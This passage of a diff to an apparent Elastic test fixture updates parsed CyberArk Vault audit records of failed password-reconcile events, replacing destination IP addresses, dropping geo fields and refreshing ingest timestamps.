Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=3;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"3\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615733350\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 07:49:11\",\"IsoTimestamp\":\"2021-03-14T14:49:11Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=3;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"3\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615733350\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", "action": "cpm reconcile password failed", @@ -486,19 +444,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "address": "10.0.1.20", @@ -518,7 +465,7 @@ }, "@timestamp": "2021-03-15T10:12:18.000Z", "file": { - "path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart" }, "ecs": { "version": "1.12.0" @@ -530,28 +477,28 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", + "reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", "iso_timestamp": "2021-03-15T10:12:18Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:12:18\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:12:18Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=4;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"4\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615803137\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:12:18\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:12:18Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=4;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"4\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615803137\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Reconcile Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { "retriescount": "4", - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", @@ -562,9 +509,9 @@ "last_task": "ReconcileTask", "cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined", "last_fail_date": "1615803137", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Reconcile Password Failed", @@ -578,8 +525,8 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-06-09T10:24:36.176783200Z", - "original": "\u003c7\u003e1 2021-03-15T10:12:18Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:12:18\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:12:18Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=4;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615803137\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:12:18\",\"IsoTimestamp\":\"2021-03-15T10:12:18Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=34.66.114.180;retriescount=4;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615803137\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:08.403089800Z", + "original": "\u003c7\u003e1 2021-03-15T10:12:18Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:12:18\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:12:18Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=4;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615803137\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:12:18\",\"IsoTimestamp\":\"2021-03-15T10:12:18Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=4;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615803137\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", "action": "cpm reconcile password failed", @@ -607,17 +554,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "address": "10.0.1.20", @@ -637,7 +575,7 @@ }, "@timestamp": "2021-03-15T10:12:19.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -649,28 +587,28 @@ ], "ip": [ "10.0.1.20", - "34.123.103.115" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n", + "reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n", "iso_timestamp": "2021-03-15T10:12:19Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:12:19\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:12:19Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.123.103.115;retriescount=1;username=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615803137\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:12:19\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:12:19Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n 